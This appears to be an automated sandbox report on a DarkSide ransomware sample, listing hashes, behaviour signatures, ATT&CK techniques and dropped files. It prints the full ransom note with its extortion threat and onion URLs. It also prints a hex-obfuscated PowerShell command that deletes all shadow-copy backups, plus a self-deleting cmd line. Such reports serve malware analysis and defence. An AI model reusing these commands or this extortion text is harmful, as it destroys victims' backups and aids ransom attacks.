Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    121s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 19:37

General

  • Target

    06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe

  • Size

    59KB

  • MD5

    91e2807955c5004f13006ff795cb803c

  • SHA1

    a3e7561de73378b453186a6c33858bf47577d69c

  • SHA256

    06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8

  • SHA512

    5d98bc32af83462938633c0d2b692d5b69c9c6151459aefc1276d41947e2514c444ed417c19b39b9c5b8d5359dee5fa2d3f7c8c30ae9f2a687cd02ec3a7b6311

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yln/pY23W58:0x7Fu4/ihrhDTV1yl/SZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.f04e4642.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data Leak ---------------------------------------------- Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. Blog URL ---------------------------------------------- http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 When you open our website, put the following data in the input form: Key: MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu

http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (148) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe
    "C:\Users\Admin\AppData\Local\Temp\06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\06CFE7~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:2892
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2856

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    5b673dcd7512cc79e81e66599b415592

    SHA1

    ca66900f22987bffbee7ae840071db87e6c6bff8

    SHA256

    3e381c5501d79d28c3d4a0f86c79e4c442513ae4e9bcd10b2caa4d44f9f0933a

    SHA512

    f633faa9207c445c2401e0ce055ebcccdeb12219108186de9a7a9a1cac7e9276ca9329054deae6d5b6073d73a692a38fac67074fd4e396b4b186725a1336f571

  • C:\Users\Admin\AppData\Local\Temp\Cab4904.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\TarAE6D.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    8af42702c6dbb248dc60d579ac9c2db5

    SHA1

    fe97037cdb7d1778e2be0b19a1f085fd1f82b2c5

    SHA256

    2dd441dbeb350cd78e81d22cc4f9f612afb98d71ffaf4f28dfbcc7a66fa552a8

    SHA512

    4a98f8022258a558945fa1aca2ac63ff3de91f134bdeb1d9c402d08232fbefd579ef3913d4ec50656109d6f94b5d7b5116e6478d8d0a3eeb9d318861b2f7656b

  • C:\Users\Admin\README.f04e4642.TXT
    Filesize

    2KB

    MD5

    7fad25f046dfb904a3a0ce766d7da931

    SHA1

    2ff8afdb6c4cdedac1683a9a6bb2f9f0a4b73717

    SHA256

    6db701f3454ea0dd8b003a69c69c442eb1817aacb08f6421c01180604b11029b

    SHA512

    65a343a094f6a96372ca08da5d39fd8b44a92e70332c81600420fde46132834117f767fc8a5712a713588681e4c44bfb454beb8a73d9ede306363087339a7813

  • memory/2612-27-0x0000000002970000-0x00000000029F0000-memory.dmp
    Filesize

    512KB

  • memory/2612-25-0x000007FEF4300000-0x000007FEF4C9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-26-0x0000000002970000-0x00000000029F0000-memory.dmp
    Filesize

    512KB

  • memory/2612-28-0x0000000002970000-0x00000000029F0000-memory.dmp
    Filesize

    512KB

  • memory/2612-29-0x000007FEF4300000-0x000007FEF4C9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-23-0x000007FEF4300000-0x000007FEF4C9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-24-0x0000000002970000-0x00000000029F0000-memory.dmp
    Filesize

    512KB

  • memory/2612-22-0x0000000002290000-0x0000000002298000-memory.dmp
    Filesize

    32KB

  • memory/2612-21-0x000000001B4A0000-0x000000001B782000-memory.dmp
    Filesize

    2.9MB